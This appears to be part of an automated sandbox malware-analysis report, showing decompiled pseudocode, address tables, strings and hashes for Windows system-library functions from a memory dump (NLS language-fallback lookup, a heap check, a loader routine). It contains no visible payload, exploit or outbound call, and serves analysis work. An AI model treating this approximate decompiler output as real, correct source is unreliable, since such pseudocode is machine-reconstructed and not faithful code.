                                                                                        • Instruction ID: 2152c065d82bb86f6dccfa625cc3dae14466bcad54a2246be2cdd50e180d2bcd
                                                                                        • Opcode Fuzzy Hash: be7a79109cb52906bfb93eb5aad2ad766545625ae80bb9ee737b6d3598bb25f4
                                                                                        • Instruction Fuzzy Hash: 295138341002608AE374CF2AC859B7277E5EF48744F64C89DE8EA8B291D639DD47EB20
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BCE620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 93%
                                                                                        			E00BCE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E00BCF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E00C095D0();
						}
						if(_t78 != 0) {
							L00BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E00C0FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E00C0BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E00C09600();
					if(_t97 < 0) {
						goto L6;
					}
					E00C0BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L00BCF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E00C0BB40(_t83, _t102 + 0x24, _t78);
								if(L00BD43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E00C0BB40(_t84, _t102 + 0x24, _t94);
									if(L00BD43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                                        0x00bce620
                                                                                        0x00bce628
                                                                                        0x00bce62f
                                                                                        0x00bce631
                                                                                        0x00bce635
                                                                                        0x00bce637
                                                                                        0x00bce63e
                                                                                        0x00c25503
                                                                                        0x00c25503
                                                                                        0x00bce64c
                                                                                        0x00bce64c
                                                                                        0x00bce651
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bce661
                                                                                        0x00bce665
                                                                                        0x00c2542a
                                                                                        0x00bce715
                                                                                        0x00bce71a
                                                                                        0x00bce71c
                                                                                        0x00bce720
                                                                                        0x00bce720
                                                                                        0x00bce727
                                                                                        0x00bce736
                                                                                        0x00bce736
                                                                                        0x00bce743
                                                                                        0x00bce743
                                                                                        0x00bce673
                                                                                        0x00bce678
                                                                                        0x00bce67d
                                                                                        0x00bce682
                                                                                        0x00bce685
                                                                                        0x00bce692
                                                                                        0x00bce69b
                                                                                        0x00bce6a3
                                                                                        0x00bce6ad
                                                                                        0x00bce6b1
                                                                                        0x00bce6b2
                                                                                        0x00bce6bb
                                                                                        0x00bce6bf
                                                                                        0x00bce6c0
                                                                                        0x00bce6c8
                                                                                        0x00bce6cc
                                                                                        0x00bce6d5
                                                                                        0x00bce6d9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bce6e5
                                                                                        0x00bce6ea
                                                                                        0x00bce6f9
                                                                                        0x00bce70b
                                                                                        0x00bce70f
                                                                                        0x00c25439
                                                                                        0x00c2545e
                                                                                        0x00c2545e
                                                                                        0x00000000
                                                                                        0x00c2545e
                                                                                        0x00c2543b
                                                                                        0x00c2543e
                                                                                        0x00c25440
                                                                                        0x00c25445
                                                                                        0x00c25472
                                                                                        0x00c25475
                                                                                        0x00c2548d
                                                                                        0x00c25493
                                                                                        0x00c254a9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c254ab
                                                                                        0x00c254b4
                                                                                        0x00c254bc
                                                                                        0x00c254c8
                                                                                        0x00c254de
                                                                                        0x00c254fb
                                                                                        0x00c254e0
                                                                                        0x00c254e6
                                                                                        0x00c254eb
                                                                                        0x00c254eb
                                                                                        0x00c254de
                                                                                        0x00000000
                                                                                        0x00c254bc
                                                                                        0x00c25477
                                                                                        0x00c2547a
                                                                                        0x00c25480
                                                                                        0x00c25483
                                                                                        0x00c25486
                                                                                        0x00c2548b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c2548b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c25447
                                                                                        0x00c25447
                                                                                        0x00c25447
                                                                                        0x00c25447
                                                                                        0x00c2544e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c25450
                                                                                        0x00c25452
                                                                                        0x00c25455
                                                                                        0x00c2545a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c2545c
                                                                                        0x00c2546a
                                                                                        0x00c2546d
                                                                                        0x00c2546f
                                                                                        0x00000000
                                                                                        0x00c2546f
                                                                                        0x00bce70f

                                                                                        Strings
                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00BCE68C
                                                                                        • InstallLanguageFallback, xrefs: 00BCE6DB
                                                                                        • @, xrefs: 00BCE6C0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                        • API String ID: 0-1757540487
                                                                                        • Opcode ID: a76ddc932a62d970eaaf6c2295e0c42444efda30eb4da5365ac9d3e7261b4166
                                                                                        • Instruction ID: cee600ee02ac5e7e2dd4b4d88bf60518036a774d1ab7842936bb77a456a6cb16
                                                                                        • Opcode Fuzzy Hash: a76ddc932a62d970eaaf6c2295e0c42444efda30eb4da5365ac9d3e7261b4166
                                                                                        • Instruction Fuzzy Hash: 0A519CB65083559BC714EF24D480B6BB3E8AF88714F05096EF999E7640FB34DE44C7A2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BEB8E4, Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 60%
                                                                                        			E00BEB8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0xcb8748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E00BCB150();
						} else {
							E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E00BCB150();
						__eflags =  *0xcb7bc8;
						if(__eflags == 0) {
							E00C82073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E00BEAB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}














                                                                                        0x00beb8f0
                                                                                        0x00beb8f2
                                                                                        0x00beb8f4
                                                                                        0x00c32c4e
                                                                                        0x00c32c50
                                                                                        0x00c32c56
                                                                                        0x00c32c5c
                                                                                        0x00c32c60
                                                                                        0x00c32c7f
                                                                                        0x00c32c84
                                                                                        0x00c32c62
                                                                                        0x00c32c77
                                                                                        0x00c32c7c
                                                                                        0x00c32c8a
                                                                                        0x00c32c8f
                                                                                        0x00c32c94
                                                                                        0x00c32c9c
                                                                                        0x00c32ca5
                                                                                        0x00c32ca5
                                                                                        0x00c32c9c
                                                                                        0x00c32c50
                                                                                        0x00beb8fa
                                                                                        0x00beb902
                                                                                        0x00beb921
                                                                                        0x00beb921
                                                                                        0x00beb924
                                                                                        0x00beb924
                                                                                        0x00beb927
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00beb929
                                                                                        0x00beb92b
                                                                                        0x00beb92d
                                                                                        0x00beb940
                                                                                        0x00000000
                                                                                        0x00beb940
                                                                                        0x00beb932
                                                                                        0x00beb932
                                                                                        0x00000000
                                                                                        0x00beb932
                                                                                        0x00000000
                                                                                        0x00beb904
                                                                                        0x00beb904
                                                                                        0x00beb90a
                                                                                        0x00beb90c
                                                                                        0x00beb916
                                                                                        0x00beb919
                                                                                        0x00beb915
                                                                                        0x00beb915
                                                                                        0x00beb91b
                                                                                        0x00beb91b
                                                                                        0x00000000
                                                                                        0x00beb910

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                        • API String ID: 0-2558761708
                                                                                        • Opcode ID: 0ba8e8bd8b90efd6bb1ef14a221e33a00659e17029e2d4d82be1e36186e0112c
                                                                                        • Instruction ID: 499c8732b5bfbb005e73d0378f9ec5318c38e964aac2a73e6e6a29f78e7500d0
                                                                                        • Opcode Fuzzy Hash: 0ba8e8bd8b90efd6bb1ef14a221e33a00659e17029e2d4d82be1e36186e0112c
                                                                                        • Instruction Fuzzy Hash: E611BE353141819FDB289B26D895F3AB3E9EF40720F2981A9F14ACB252DB30DC44E681
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BDD5E0, Relevance: 2.9, Strings: 2, Instructions: 353COMMONCrypto
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 87%
                                                                                        			E00BDD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0xcbd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E00BD6600(0xcb52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0xcb7b9c; // 0x0
							_t281 = L00BE4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E00C0F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0xcb7b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0xcb7b8c; // 0x762a60
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E00BE2280(_t200, 0xcb84d8);
									_t277 =  *0xcb85f4; // 0x762f50
									_t351 =  *0xcb85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x762ee8
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E00BDFFB0(_t287, _t353, 0xcb84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E00C1CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E00BD6600(0xcb52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E00BD7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0xcbb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E00C4E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0xcb8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0xcbb1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0xcbb218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E00BE2280(_t250, 0xcb84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L00C03898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E00BDFFB0(_t293, _t353, 0xcb84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E00C037F5(_t353, 0);
																}
																E00C00413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E00BF9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E00BF02D6(_t174);
																}
																L00BE77F0( *0xcb7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E00BFC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L00BDEC7F(_t353);
										L00BF19B8(_t287, 0, _t353, 0);
										_t200 = E00BCF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L00BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0xcbb2f8 |  *0xcbb2fc) == 0 || ( *0xcbb2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E00C0B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0xcbb2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E00C76B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E00C76AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E00BDE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L00BDEAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E00C09730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E00BDE9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L00BD8F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E00C03C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}





































































































                                                                                        0x00bdd5f2
                                                                                        0x00bdd5f5
                                                                                        0x00bdd5f5
                                                                                        0x00bdd5fd
                                                                                        0x00bdd600
                                                                                        0x00bdd60a
                                                                                        0x00bdd60d
                                                                                        0x00bdd617
                                                                                        0x00bdd61d
                                                                                        0x00bdd627
                                                                                        0x00bdd62e
                                                                                        0x00bdd911
                                                                                        0x00bdd913
                                                                                        0x00000000
                                                                                        0x00bdd919
                                                                                        0x00bdd919
                                                                                        0x00bdd919
                                                                                        0x00bdd634
                                                                                        0x00bdd634
                                                                                        0x00bdd634
                                                                                        0x00bdd634
